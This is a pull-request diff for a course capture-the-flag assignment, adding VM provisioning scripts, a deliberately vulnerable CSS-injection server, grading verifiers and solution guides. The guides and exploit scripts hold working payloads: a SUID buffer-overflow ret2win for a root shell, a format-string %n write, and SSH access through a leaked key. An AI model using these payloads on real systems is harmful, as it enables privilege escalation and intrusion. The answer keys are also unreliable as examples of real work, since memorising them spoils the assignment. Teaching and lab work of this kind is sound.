+printf '%s\n' "$FLAG_P1" > /home/p1/flags/flag_p1.txt
+chown p1:p1 /home/p1/flags/flag_p1.txt
+chmod 600 /home/p1/flags/flag_p1.txt
+
+# Write P2 flag
+printf '%s\n' "$FLAG_P2" > /root/flag_p2.txt
+chmod 600 /root/flag_p2.txt
+
+# Write P3 flag
+install -d -m 755 -o p3flag -g p3flag /opt/p3
+printf '%s\n' "$FLAG_P3" > /opt/p3/flag_p3.txt
+chown p3flag:p3flag /opt/p3/flag_p3.txt
+chmod 600 /opt/p3/flag_p3.txt
+
+# Write P4 flag
+install -d -m 755 -o p4flag -g p4flag /opt/p4
+printf '%s\n' "$FLAG_P4" > /opt/p4/flag_p4.txt
+chown p4flag:p4flag /opt/p4/flag_p4.txt
+chmod 600 /opt/p4/flag_p4.txt
+
+# Write P5 flag (ctfadmin)
+install -d -m 700 -o ctfadmin -g ctfadmin /home/ctfadmin/flags
+printf '%s\n' "$FLAG_P5" > /home/ctfadmin/flags/flag_p5.txt
+chown ctfadmin:ctfadmin /home/ctfadmin/flags/flag_p5.txt
+chmod 600 /home/ctfadmin/flags/flag_p5.txt
+BOOT
+  chmod 750 /opt/ctf/boot-keygen.sh
+  chown root:root /opt/ctf/boot-keygen.sh
+  systemctl restart ctf-bootkey.service || true
+fi
+
+# 10) Extend ctf-extract to support P1-P5
+if [[ -f /usr/local/bin/ctf-extract ]]; then
+  cat > /usr/local/bin/ctf-extract <<'EXTRACT'
+#!/usr/bin/env bash
+set -euo pipefail
+
+PROBLEM=${1:-P1}
+KEY_FILE=/home/p1/.keys/boot.key
+
+if [[ ! -r "$KEY_FILE" ]]; then
+  echo "[!] Cannot read key file. You need P1 access."
+  exit 1
+fi
+
+KEY=$(cat "$KEY_FILE")
+
+FLAG_PATH=""
+NEED_SOLVED=""
+COMPUTE_FLAG="0"
+COMPUTE_TAG=""
+case "$PROBLEM" in
+  P1) FLAG_PATH=/home/p1/flags/flag_p1.txt ;;
+  P2) FLAG_PATH=/root/flag_p2.txt ;;
+  P3) NEED_SOLVED=/opt/p3/solved; COMPUTE_FLAG="1"; COMPUTE_TAG="P3" ;;
+  P4) NEED_SOLVED=/opt/p4/solved; COMPUTE_FLAG="1"; COMPUTE_TAG="P4" ;;
+  P5) NEED_SOLVED=/opt/p5/solved; COMPUTE_FLAG="1"; COMPUTE_TAG="P5" ;;
+  *) echo "Usage: ctf-extract P1|P2|P3|P4|P5"; exit 1 ;;
+esac
+
+if [[ -n "$NEED_SOLVED" ]] && [[ ! -r "$NEED_SOLVED" ]]; then
+  echo "[!] ${PROBLEM} not solved yet. Complete the ${PROBLEM} task first."
+  exit 1
+fi
+
+if [[ "$COMPUTE_FLAG" == "1" ]]; then
+  FLAG=$(printf '%s' "${COMPUTE_TAG}:${KEY}" | sha256sum | awk '{print $1}')
+elif [[ -r "$FLAG_PATH" ]]; then
+  FLAG=$(cat "$FLAG_PATH")
+else
+  echo "[!] Cannot read flag. You do not yet have required access."
+  exit 1
+fi
+
+cat > flag.txt <<EOF
+$FLAG
+EOF
+
+cat > key.txt <<EOF
+$KEY
+EOF
+
+echo "Wrote flag.txt, key.txt"
+EXTRACT
+  chmod 755 /usr/local/bin/ctf-extract
+  chown root:root /usr/local/bin/ctf-extract
+fi
+
+echo "P5 provisioned. Server at http://127.0.0.1:5005 and VNC on :1"

--- a/infrastructure/provision/p5/provision_p5.sh
+++ b/infrastructure/provision/p5/provision_p5.sh
@@ -33,7 +33,7 @@ chown -R ctfadmin:ctfadmin /opt/p5
 chmod 755 /opt/p5
 
 # 4) Install server
-install -m 755 -o root -g root /vagrant/p5/server.py /opt/p5/server.py
+install -m 755 -o root -g root /vagrant/provision/p5/server.py /opt/p5/server.py
 
 # 5) Create CSS file placeholder
 if [[ ! -f /opt/p5/user.css ]]; then

--- a/infrastructure/provision/p5/server.py
+++ b/infrastructure/provision/p5/server.py
@@ -1,0 +1,104 @@
+#!/usr/bin/env python3
+import os
+from http.server import BaseHTTPRequestHandler, HTTPServer
+from urllib.parse import urlparse, parse_qs
+
+BASE_DIR = "/opt/p5"
+CSS_PATH = os.path.join(BASE_DIR, "user.css")
+FLAG_PATH = "/home/ctfadmin/flags/flag_p5.txt"
+SOLVED_PATH = os.path.join(BASE_DIR, "solved")
+
+HTML_TEMPLATE = """<!doctype html>
+<html>
+<head>
+  <meta charset="utf-8" />
+  <title>Admin Panel</title>
+  <style>
+    #flag {{ display: none; }}
+  </style>
+  <link rel="stylesheet" href="/user.css" />
+</head>
+<body>
+  <h1>Admin Panel</h1>
+  <p>Restricted area.</p>
+  <div id="flag" data-flag="{flag}">FLAG</div>
+</body>
+</html>
+"""
+
+INDEX_TEMPLATE = """<!doctype html>
+<html>
+<head><meta charset="utf-8" /><title>P5</title></head>
+<body>
+  <h1>P5 CSS Challenge</h1>
+  <p>Submit CSS to be loaded on the admin page.</p>
+  <form method="POST" action="/submit">
+    <textarea name="css" rows="12" cols="80"></textarea><br />
+    <button type="submit">Submit CSS</button>
+  </form>
+</body>
+</html>
+"""
+
+class Handler(BaseHTTPRequestHandler):
+    def _send(self, code, content, content_type="text/html; charset=utf-8", extra_headers=None):
+        self.send_response(code)
+        self.send_header("Content-Type", content_type)
+        self.send_header("Content-Length", str(len(content)))
+        if extra_headers:
+            for k, v in extra_headers.items():
+                self.send_header(k, v)
+        self.end_headers()
+        self.wfile.write(content)
+
+    def do_GET(self):
+        path = urlparse(self.path).path
+        if path == "/":
+            self._send(200, INDEX_TEMPLATE.encode())
+            return
+        if path == "/admin":
+            try:
+                with open(FLAG_PATH, "r", encoding="utf-8") as f:
+                    flag = f.read().strip()
+            except FileNotFoundError:
+                flag = "MISSING"
+            html = HTML_TEMPLATE.format(flag=flag).encode()
+            self._send(200, html, extra_headers={"Cache-Control": "no-store"})
+            return
+        if path == "/user.css":
+            if os.path.exists(CSS_PATH):
+                with open(CSS_PATH, "rb") as f:
+                    data = f.read()
+            else:
+                data = b"/* no css */"
+            self._send(200, data, "text/css; charset=utf-8", extra_headers={"Cache-Control": "no-store"})
+            return
+        self._send(404, b"not found", "text/plain; charset=utf-8")
+
+    def do_POST(self):
+        path = urlparse(self.path).path
+        if path != "/submit":
+            self._send(404, b"not found", "text/plain; charset=utf-8")
+            return
+        length = int(self.headers.get("Content-Length", "0"))
+        if length > 8192:
+            self._send(413, b"payload too large", "text/plain; charset=utf-8")
+            return
+        body = self.rfile.read(length)
+        form = parse_qs(body.decode("utf-8", errors="ignore"))
+        css = form.get("css", [""])[0].encode("utf-8")
+        os.makedirs(BASE_DIR, exist_ok=True)
+        with open(CSS_PATH, "wb") as f:
+            f.write(css)
+        with open(SOLVED_PATH, "w", encoding="utf-8") as f:
+            f.write("ok\n")
+        self._send(200, b"ok", "text/plain; charset=utf-8")
+
+
+def main():
+    server = HTTPServer(("127.0.0.1", 5005), Handler)
+    server.serve_forever()
+
+
+if __name__ == "__main__":
+    main()

--- a/solutions/FLAG_EXTRACTION.md
+++ b/solutions/FLAG_EXTRACTION.md
@@ -1,0 +1,88 @@
+# Flag Extraction Steps (P1–P5)
+
+This document lists the exact commands to extract flags and generate the submission files for each problem.
+
+## Common Notes
+- Run these **inside the VM** unless noted.
+- Flags are **per‑boot**. If the VM reboots, you must re‑run `ctf-extract` after solving again.
+- `ctf-extract` writes `flag.txt` and `key.txt` in the **current directory**.
+
+---
+
+## Problem 1 (P1)
+After you have access as `p1`:
+```bash
+ctf-extract P1
+```
+Package submission:
+```bash
+tar -czf 2022CSZ123456-P1.tar.gz flag.txt key.txt
+```
+Copy to host:
+```bash
+scp -P 2222 p1@localhost:/home/p1/2022CSZ123456-P1.tar.gz .
+```
+
+---
+
+## Problem 2 (P2)
+After you obtain a root shell (or have root access):
+```bash
+ctf-extract P2
+```
+Package submission:
+```bash
+tar -czf 2022CSZ123456-P2.tar.gz flag.txt key.txt
+```
+Copy to host:
+```bash
+scp -P 2222 p1@localhost:/home/p1/2022CSZ123456-P2.tar.gz .
+```
+
+---
+
+## Problem 3 (P3)
+After you successfully exploit P3 (which creates `/opt/p3/solved`):
+```bash
+ctf-extract P3
+```
+Package submission:
+```bash
+tar -czf 2022CSZ123456-P3.tar.gz flag.txt key.txt
+```
+Copy to host:
+```bash
+scp -P 2222 p1@localhost:/home/p1/2022CSZ123456-P3.tar.gz .
+```
+
+---
+
+## Problem 4 (P4)
+After you successfully exploit P4 (which creates `/opt/p4/solved`):
+```bash
+ctf-extract P4
+```
+Package submission:
+```bash
+tar -czf 2022CSZ123456-P4.tar.gz flag.txt key.txt
+```
+Copy to host:
+```bash
+scp -P 2222 p1@localhost:/home/p1/2022CSZ123456-P4.tar.gz .
+```
+
+---
+
+## Problem 5 (P5)
+After you submit CSS for P5 (which creates `/opt/p5/solved`):
+```bash
+ctf-extract P5
+```
+Package submission:
+```bash
+tar -czf 2022CSZ123456-P5.tar.gz flag.txt key.txt
+```
+Copy to host:
+```bash
+scp -P 2222 p1@localhost:/home/p1/2022CSZ123456-P5.tar.gz .
+```

--- a/solutions/README.md
+++ b/solutions/README.md
@@ -1,0 +1,329 @@
+# Testing and Solution Guide
+
+## Problem 1: Gain Access
+
+### Summary
+
+Goal: Obtain an unprivileged shell as `p1` and extract the flag from the home directory.
+Hint: Look for information leakage on a public server that helps you connect.
+
+### Steps
+
+1. Discover the leak via `robots.txt`:
+
+```bash
+curl http://localhost:8000/robots.txt
+```
+
+2. Download the leaked SSH key and fix permissions:
+
+```bash
+curl -o id_rsa http://localhost:8000/backup/id_rsa
+chmod 600 id_rsa
+```
+
+3. SSH into the VM as `p1`:
+
+```bash
+ssh -i id_rsa -p 2222 p1@localhost
+```
+
+4. Generate submission files inside the VM:
+
+```bash
+ctf-extract
+```
+
+5. Package files for submission:
+
+```bash
+tar -czf 2022CSZ123456-P1.tar.gz flag.txt key.txt
+```
+
+## Problem 2: Become Super
+
+### Summary
+
+Goal: Exploit a SUID-root binary in `/home/p1/p2/p2` to get a root shell and extract the P2 flag.
+Hint: Classic stack buffer overflow with a `win()` function.
+
+### Checks (inside VM)
+
+```bash
+ls -l /home/p1/p2/p2
+file /home/p1/p2/p2
+nm -n /home/p1/p2/p2 | grep " win$"
+```
+
+### Find the offset (pwntools)
+
+1. Generate a cyclic pattern and crash the program:
+
+```bash
+python3 - <<'PY' > /tmp/pat
+from pwn import cyclic
+print(cyclic(300, n=8).decode())
+PY
+
+gdb -q /home/p1/p2/p2
+(gdb) run < /tmp/pat
+(gdb) info registers pc
+```
+
+2. Compute the offset:
+
+```bash
+python3 - <<'PY'
+from pwn import cyclic_find
+# Replace with the PC value from gdb (example below uses the bytes shown in the run log)
+pc_bytes = b"jaaaaaaa"
+print(cyclic_find(pc_bytes, n=8))
+PY
+```
+
+### Working exploit (interactive shell)
+
+1. Create the payload (replace `offset` or `win` if needed):
+
+```bash
+python3 - <<'PY' > /tmp/payload
+from pwn import p64
+offset = 72
+win = 0x400704
+payload = b"A"*offset + p64(win) + b"\n"
+import sys
+sys.stdout.buffer.write(payload)
+PY
+```
+
+2. Keep stdin open and interact:
+
+```bash
+cat /tmp/payload - | /home/p1/p2/p2
+id
+cat /root/flag_p2.txt
+```
+
+Expected output (example):
+
+```text
+uid=0(root) gid=0(root) groups=0(root),1001(p1)
+<flag-value>
+```
+
+### Submission
+
+```bash
+ctf-extract P2
+tar -czf 2022CSZ123456-P2.tar.gz flag.txt key.txt
+```
+
+Copy submission to host:
+
+```bash
+scp -P 2222 -i id_rsa p1@localhost:2022CSZ123456-P2.tar.gz .
+```
+
+## Problem 3: Changing the Flow
+
+### Summary
+
+Goal: Redirect execution to `win()` in `/home/p1/p3/p3` (NX enabled) to print the P3 flag.
+Hint: No injected code allowed; use ret2win.
+
+### Checks (inside VM)
+
+```bash
+ls -l /home/p1/p3/p3
+file /home/p1/p3/p3
+nm -n /home/p1/p3/p3 | grep " win$"
+```
+
+### High-Level Steps
+
+1. Find the offset to the return address (pattern + GDB).
+2. Overwrite return address with `win()` address.
+3. Read the printed flag. The binary also writes `/opt/p3/solved`, which enables `ctf-extract P3`.
+
+### Concrete Steps (AArch64 example)
+
+1. Get the `win()` address (use the current binary output):
+
+```bash
+nm -n /home/p1/p3/p3 | grep " win$"
+```
+
+Example output:
+
+```
+000000000040081c t win
+```
+
+1. Generate a cyclic pattern and crash:
+
+```bash
+python3 - <<'PY' > /tmp/pat
+from pwn import cyclic
+print(cyclic(300, n=8).decode())
+PY
+
+gdb -q /home/p1/p3/p3
+(gdb) run < /tmp/pat
+(gdb) info registers pc
+```
+
+1. Compute the offset (convert PC to bytes; example shown):
+
+```bash
+python3 - <<'PY'
+from pwn import cyclic_find
+pc_bytes = b"jaaaaaaa"  # replace with bytes from your PC value
+print(cyclic_find(pc_bytes, n=8))
+PY
+```
+
+This is typically `72` on this binary.
+
+1. Build and run the payload (replace the `win` address if it differs):
+
+```bash
+python3 - <<'PY' > /tmp/p3_payload
+from pwn import p64
+offset = 72
+win = 0x40081c   # replace with nm output
+payload = b"A"*offset + p64(win) + b"\n"
+open("/tmp/p3_payload","wb").write(payload)
+PY
+
+cat /tmp/p3_payload | /home/p1/p3/p3
+```
+
+Expected output:
+
+```
+FLAG: <flag-value>
+```
+
+### Submission
+
+```bash
+ctf-extract P3
+tar -czf 2022CSZ123456-P3.tar.gz flag.txt key.txt
+```
+
+Copy submission to host:
+
+```bash
+scp -P 2222 -i id_rsa p1@localhost:2022CSZ123456-P3.tar.gz .
+```
+
+## Problem 4: Trusted Code Reuse
+
+### Summary
+
+Goal: Use a format-string bug to flip an auth check and trigger `win()` in `/home/p1/p4/p4`.
+Hint: `printf` is called directly on your input with a pointer argument on the stack.
+
+### Checks (inside VM)
+
+```bash
+ls -l /home/p1/p4/p4
+file /home/p1/p4/p4
+
+
+p1@vagrant:~$  nm -n /home/p1/p4/p4 | grep " win$"
+nm -n /home/p1/p4/p4 | grep " fp$"
+0000000000400984 t win
+0000000000411088 d fp
+```
+
+### High-Level Steps
+
+1. Find the format-string argument offset for your input.
+2. Use `%n` to write `0x1337` into `auth`. They find this by using GDB to inspect the stack.
+3. The program switches `fp` to `win()` and prints the flag, also creating `/opt/p4/solved`.
+
+### Example (offset discovery)
+
+```bash
+python3 - <<'PY' | /home/p1/p4/p4
+print("AAAA." + ".".join("%p" for _ in range(20)))
+PY
+```
+
+### Example (auth overwrite)
+
+Because `printf` is called as `printf(buf, &auth, dummy)`, you can use positional specifiers:
+
+```bash
+python3 - <<'PY' | /home/p1/p4/p4
+# 0x1337 = 4919
+print("%2$4919c%1$n")
+PY
+```
+
+Expected output:
+
+```
+FLAG: <flag-value>
+```
+
+### Submission
+
+```bash
+ctf-extract P4
+tar -czf 2022CSZ123456-P4.tar.gz flag.txt key.txt
+```
+
+Copy submission to host:
+
+```bash
+scp -P 2222 -i id_rsa p1@localhost:2022CSZ123456-P4.tar.gz .
+```
+
+## Problem 5: CSS Hijacking
+
+### Summary
+
+Goal: Use CSS to reveal the hidden flag on the admin page loaded in Epiphany.
+Hint: The admin page loads your CSS from `/submit` and hides the flag with CSS.
+
+### Steps (inside VM)
+
+1. Open Epiphany (via VNC, host port `5901`) and visit:
+   - `http://127.0.0.1:5005/` (CSS submit page)
+   - `http://127.0.0.1:5005/admin` (admin page)
+2. Submit CSS that reveals `#flag`:
+
+```css
+#flag { display: block !important; color: red; font-size: 24px; }
+#flag::after { content: attr(data-flag); }
+```
+
+3. Reload the admin page to see the flag and then run:
+
+```bash
+ctf-extract P5
+```
+
+### Reset P5 (for testing)
+
+```bash
+sudo rm -f /opt/p5/solved
+echo "/* submit CSS to reveal the flag */" | sudo tee /opt/p5/user.css >/dev/null
+sudo chown ctfadmin:ctfadmin /opt/p5/user.css
+sudo chmod 644 /opt/p5/user.css
+sudo systemctl restart p5-server.service
+```
+
+### Submission
+
+```bash
+tar -czf 2022CSZ123456-P5.tar.gz flag.txt key.txt
+```
+
+Copy submission to host:
+
+```bash
+scp -P 2222 -i id_rsa p1@localhost:2022CSZ123456-P5.tar.gz .
+```

--- a/solutions/README_x86.md
+++ b/solutions/README_x86.md
@@ -1,0 +1,172 @@
+# Solution Guide (x86_64 / Intel)
+
+This guide mirrors `solution/README.md` but assumes an x86_64 (Intel/AMD) VM.
+Use it when you replicate the VM on an amd64 host.
+
+## Problem 1: Gain Access
+
+### Summary
+Goal: Obtain an unprivileged shell as `p1` and extract the P1 flag.
+Hint: A public server often leaks files it shouldn’t.
+
+### Steps
+1. Find the leaked SSH key on the web server (see `robots.txt` and backups).
+2. Use the key to SSH into the VM as `p1`.
+3. Extract the flag:
+```bash
+ctf-extract P1
+```
+
+### Submission
+```bash
+tar -czf 2022CSZ123456-P1.tar.gz flag.txt key.txt
+```
+
+---
+
+## Problem 2: Become Super (SUID ret2win)
+
+### Summary
+Goal: Exploit the SUID binary `/home/p1/p2/p2` to get a root shell and extract the P2 flag.
+
+### Steps (x86_64)
+1. Find the `win()` address:
+```bash
+nm -n /home/p1/p2/p2 | grep " win$"
+```
+2. Find the offset to RIP (use a cyclic pattern):
+```bash
+python3 - <<'PY' > /tmp/p2_pat
+from pwn import cyclic
+print(cyclic(400, n=8).decode())
+PY
+
+gdb -q /home/p1/p2/p2
+(gdb) run < /tmp/p2_pat
+(gdb) info registers rip
+(gdb) x/4gx $rsp
+0x7ffd4f3719b8: 0x616161616161616a      0x616161616161616b
+0x7ffd4f3719c8: 0x616161616161616c      0x616161616161616d
+```
+3. Compute the offset:
+```bash
+# 61 61 61 61 61 61 61 6c
+# jaaaaaaa
+
+python3 - <<'PY'
+from pwn import cyclic_find
+pc_bytes = b"jaaaaaaa"
+print(cyclic_find(pc_bytes, n=8))
+PY
+```
+4. Build payload and get root:
+```bash
+python3 - <<'PY'
+from pwn import *
+elf = ELF('/home/p1/p2/p2')
+rop = ROP(elf)
+print("win =", hex(elf.symbols['win']))
+print("ret =", hex(rop.find_gadget(['ret']).address))
+PY
+
+python3 - <<'PY' > /tmp/p2_payload
+import sys
+from pwn import p64
+offset = 72
+ret = 0x40101a      # replace with your gadget
+win = 0x4011b6      # from nm / pwntools
+sys.stdout.buffer.write(b"A"*offset + p64(ret) + p64(win) + b"\n")
+PY
+
+cat /tmp/p2_payload - | /home/p1/p2/p2
+
+```
+5. Extract:
+```bash
+id
+ctf-extract P2
+```
+
+---
+
+## Problem 3: Changing the Flow (NX ret2win)
+
+### Summary
+Goal: Hijack control flow of `/home/p1/p3/p3` to reach `win()` and reveal the flag.
+
+### Steps (x86_64)
+1. Find `win()`:
+```bash
+nm -n /home/p1/p3/p3 | grep " win$"
+```
+2. Find offset with cyclic pattern (same method as P2).
+3. Build payload:
+```bash
+python3 - <<'PY' | /home/p1/p3/p3
+from pwn import p64
+offset = 72  # replace with your result
+win = 0x400784  # replace with nm output
+print(b"A"*offset + p64(win))
+PY
+```
+4. After `win()` runs, it creates `/opt/p3/solved`. Then:
+```bash
+ctf-extract P3
+```
+
+---
+
+## Problem 4: Trusted Code Reuse (Format String Auth Gate)
+
+### Summary
+Goal: Use a format-string bug in `/home/p1/p4/p4` to set the auth value to `0x1337`.
+
+### Steps (x86_64)
+1. Identify argument positions (typical in this binary: auth is `%1$`, dummy is `%2$`).
+2. Write `0x1337` (decimal 4919) into `auth`:
+```bash
+python3 - <<'PY' | /home/p1/p4/p4
+print("%2$4919c%1$n")
+PY
+```
+3. `win()` prints the flag and writes `/opt/p4/solved`.
+4. Extract:
+```bash
+ctf-extract P4
+```
+
+---
+
+## Problem 5: CSS Hijacking (Epiphany + VNC)
+
+### Summary
+Goal: Use CSS to reveal a hidden flag on the admin page.
+
+### Steps
+1. Connect via VNC on host port `5901`.
+2. Open Epiphany:
+```bash
+epiphany-browser
+```
+3. Visit:
+   - `http://127.0.0.1:5005/`
+   - `http://127.0.0.1:5005/admin`
+4. Submit this CSS:
+```css
+#flag { display: block !important; color: red; font-size: 24px; }
+#flag::after { content: attr(data-flag); }
+```
+5. Reload the admin page to see the flag, then:
+```bash
+ctf-extract P5
+```
+
+### Reset P5 (for testing)
+```bash
+sudo rm -f /opt/p5/solved
+echo "/* submit CSS to reveal the flag */" | sudo tee /opt/p5/user.css >/dev/null
+sudo chown ctfadmin:ctfadmin /opt/p5/user.css
+sudo chmod 644 /opt/p5/user.css
+sudo systemctl restart p5-server.service
+```
+

--- a/solutions/README_x86.md
+++ b/solutions/README_x86.md
@@ -1,6 +1,6 @@
 # Solution Guide (x86_64 / Intel)
 
-This guide mirrors `solution/README.md` but assumes an x86_64 (Intel/AMD) VM.
+This guide mirrors `solutions/README.md` but assumes an x86_64 (Intel/AMD) VM.
 Use it when you replicate the VM on an amd64 host.
 
 ## Problem 1: Gain Access

--- a/solutions/grading/verify_p1.py
+++ b/solutions/grading/verify_p1.py
@@ -1,0 +1,48 @@
+#!/usr/bin/env python3
+import argparse
+import hashlib
+import sys
+from pathlib import Path
+
+
+def sha256_hex(s: str) -> str:
+    return hashlib.sha256(s.encode()).hexdigest()
+
+
+def read_text(path: Path) -> str:
+    return path.read_text(encoding="utf-8").strip()
+
+
+def main() -> int:
+    p = argparse.ArgumentParser(description="Verify NSS A2 P1 submission files")
+    p.add_argument("--key", help="Path to boot.key used for this VM boot (optional if key.txt exists)")
+    p.add_argument("--keytxt", default="key.txt", help="Path to key.txt (submission)")
+    p.add_argument("--flag", default="flag.txt", help="Path to flag.txt")
+    args = p.parse_args()
+
+    key_path = Path(args.key) if args.key else Path(args.keytxt)
+    if not key_path.exists():
+        print("[FAIL] No key provided. Use --key or include key.txt in the submission.")
+        return 2
+
+    key = read_text(key_path)
+    flag = read_text(Path(args.flag))
+
+    exp_flag = sha256_hex(f"P1:{key}")
+
+    ok = True
+    if flag != exp_flag:
+        print("[FAIL] flag.txt does not match expected value")
+        ok = False
+
+    if ok:
+        print("[OK] P1 submission verified")
+        return 0
+
+    print("[INFO] Expected values:")
+    print(f"flag:    {exp_flag}")
+    return 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/solutions/grading/verify_p3.py
+++ b/solutions/grading/verify_p3.py
@@ -1,0 +1,44 @@
+#!/usr/bin/env python3
+import argparse
+import hashlib
+import sys
+from pathlib import Path
+
+
+def sha256_hex(s: str) -> str:
+    return hashlib.sha256(s.encode()).hexdigest()
+
+
+def read_text(path: Path) -> str:
+    return path.read_text(encoding="utf-8").strip()
+
+
+def main() -> int:
+    p = argparse.ArgumentParser(description="Verify NSS A2 P3 submission files")
+    p.add_argument("--key", help="Path to boot.key used for this VM boot (optional if key.txt exists)")
+    p.add_argument("--keytxt", default="key.txt", help="Path to key.txt (submission)")
+    p.add_argument("--flag", default="flag.txt", help="Path to flag.txt")
+    args = p.parse_args()
+
+    key_path = Path(args.key) if args.key else Path(args.keytxt)
+    if not key_path.exists():
+        print("[FAIL] No key provided. Use --key or include key.txt in the submission.")
+        return 2
+
+    key = read_text(key_path)
+    flag = read_text(Path(args.flag))
+
+    exp_flag = sha256_hex(f"P3:{key}")
+
+    if flag != exp_flag:
+        print("[FAIL] flag.txt does not match expected value")
+        print("[INFO] Expected flag:")
+        print(exp_flag)
+        return 1
+
+    print("[OK] P3 submission verified")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/solutions/grading/verify_p4.py
+++ b/solutions/grading/verify_p4.py
@@ -1,0 +1,44 @@
+#!/usr/bin/env python3
+import argparse
+import hashlib
+import sys
+from pathlib import Path
+
+
+def sha256_hex(s: str) -> str:
+    return hashlib.sha256(s.encode()).hexdigest()
+
+
+def read_text(path: Path) -> str:
+    return path.read_text(encoding="utf-8").strip()
+
+
+def main() -> int:
+    p = argparse.ArgumentParser(description="Verify NSS A2 P4 submission files")
+    p.add_argument("--key", help="Path to boot.key used for this VM boot (optional if key.txt exists)")
+    p.add_argument("--keytxt", default="key.txt", help="Path to key.txt (submission)")
+    p.add_argument("--flag", default="flag.txt", help="Path to flag.txt")
+    args = p.parse_args()
+
+    key_path = Path(args.key) if args.key else Path(args.keytxt)
+    if not key_path.exists():
+        print("[FAIL] No key provided. Use --key or include key.txt in the submission.")
+        return 2
+
+    key = read_text(key_path)
+    flag = read_text(Path(args.flag))
+
+    exp_flag = sha256_hex(f"P4:{key}")
+
+    if flag != exp_flag:
+        print("[FAIL] flag.txt does not match expected value")
+        print("[INFO] Expected flag:")
+        print(exp_flag)
+        return 1
+
+    print("[OK] P4 submission verified")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/solutions/grading/verify_p5.py
+++ b/solutions/grading/verify_p5.py
@@ -1,0 +1,44 @@
+#!/usr/bin/env python3
+import argparse
+import hashlib
+import sys
+from pathlib import Path
+
+
+def sha256_hex(s: str) -> str:
+    return hashlib.sha256(s.encode()).hexdigest()
+
+
+def read_text(path: Path) -> str:
+    return path.read_text(encoding="utf-8").strip()
+
+
+def main() -> int:
+    p = argparse.ArgumentParser(description="Verify NSS A2 P5 submission files")
+    p.add_argument("--key", help="Path to boot.key used for this VM boot (optional if key.txt exists)")
+    p.add_argument("--keytxt", default="key.txt", help="Path to key.txt (submission)")
+    p.add_argument("--flag", default="flag.txt", help="Path to flag.txt")
+    args = p.parse_args()
+
+    key_path = Path(args.key) if args.key else Path(args.keytxt)
+    if not key_path.exists():
+        print("[FAIL] No key provided. Use --key or include key.txt in the submission.")
+        return 2
+
+    key = read_text(key_path)
+    flag = read_text(Path(args.flag))
+
+    exp_flag = sha256_hex(f"P5:{key}")
+
+    if flag != exp_flag:
+        print("[FAIL] flag.txt does not match expected value")
+        print("[INFO] Expected flag:")
+        print(exp_flag)
+        return 1
+
+    print("[OK] P5 submission verified")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/solutions/p3_exploit.py
+++ b/solutions/p3_exploit.py
@@ -1,0 +1,35 @@
+#!/usr/bin/env python3
+"""
+P3: ret2win exploit — redirect execution to win() via stack buffer overflow.
+
+The binary /home/p1/p3/p3 uses gets() with a 64-byte buffer (vuln function).
+NX is enabled so we cannot inject shellcode; instead we overwrite the return
+address with the address of the existing win() function (ret2win technique).
+
+Usage (inside the VM):
+    python3 p3_exploit.py | /home/p1/p3/p3
+
+Steps to find the win() address:
+    nm -n /home/p1/p3/p3 | grep " win$"
+
+Steps to find the offset (typically 72 on this binary):
+    # Generate cyclic pattern
+    python3 -c "from pwn import cyclic; print(cyclic(300, n=8).decode())" > /tmp/pat
+    gdb -q /home/p1/p3/p3
+    (gdb) run < /tmp/pat
+    (gdb) info registers pc
+    # Then compute offset from the PC value:
+    python3 -c "from pwn import cyclic_find; print(cyclic_find(b'jaaaaaaa', n=8))"
+"""
+
+import sys
+from pwn import p64
+
+# Replace win_addr with the output of: nm -n /home/p1/p3/p3 | grep " win$"
+# AArch64 example: 0x40081c  |  x86_64 example: 0x400784
+win_addr = 0x40081c   # <-- update if your binary differs
+
+offset = 72           # bytes from input start to the return address
+
+payload = b"A" * offset + p64(win_addr) + b"\n"
+sys.stdout.buffer.write(payload)

--- a/solutions/p4_exploit.py
+++ b/solutions/p4_exploit.py
@@ -1,0 +1,30 @@
+#!/usr/bin/env python3
+"""
+P4: Format-string exploit — write 0x1337 into auth to unlock win().
+
+The binary /home/p1/p4/p4 calls:
+    printf(buf, &auth, dummy)
+where buf is user-controlled. By using a positional %n specifier we can
+write an integer value into auth without touching the return address at all.
+
+Usage (inside the VM):
+    python3 p4_exploit.py | /home/p1/p4/p4
+
+How it works:
+    printf is called as printf(buf, &auth, dummy).
+    Argument 1 is &auth, argument 2 is dummy.
+    %1$n  → writes the number of bytes printed so far into *arg1 (= auth)
+    %2$Nc → prints N spaces using arg2 as the width (pads output to N bytes)
+
+    We need auth == 0x1337 == 4919 (decimal).
+    So: print 4919 characters first, then write that count into auth:
+        "%2$4919c%1$n"
+
+Discovery (how to find argument positions):
+    python3 -c 'print("AAAA." + ".".join("%p" for _ in range(20)))' | /home/p1/p4/p4
+    Inspect which position prints 0x41414141 to confirm your layout.
+"""
+
+# 0x1337 = 4919 decimal
+# arg 1 = &auth, arg 2 = dummy (pad via %2$Nc to avoid a real pointer dereference)
+print("%2$4919c%1$n")


### PR DESCRIPTION
## Summary

- Replaces the flat student-assignment README with a **repo overview** that navigates three logical sections
- Adds `assignment/` — the original student-facing problem statement preserved verbatim
- Adds `infrastructure/` — the full VM build guide, Vagrantfile, and per-problem provisioning scripts (P1–P5) including vulnerable C source code (`p2.c`, `p3.c`, `p4.c`) so students can study the intentionally-vulnerable programs
- Adds `solutions/` — complete step-by-step walkthroughs for both AArch64 and x86_64, standalone exploit scripts for P3 (ret2win) and P4 (format-string), flag extraction guide, and grading verification scripts

## Test plan

- [ ] Verify all links in `README.md` resolve correctly on GitHub
- [ ] Confirm `infrastructure/` provisioning scripts match what was used to build the VM
- [ ] Confirm `solutions/README.md` and `solutions/README_x86.md` walkthroughs are accurate
- [ ] Confirm `solutions/grading/verify_pN.py` scripts correctly verify student submissions

🤖 Generated with [Claude Code](https://claude.com/claude-code)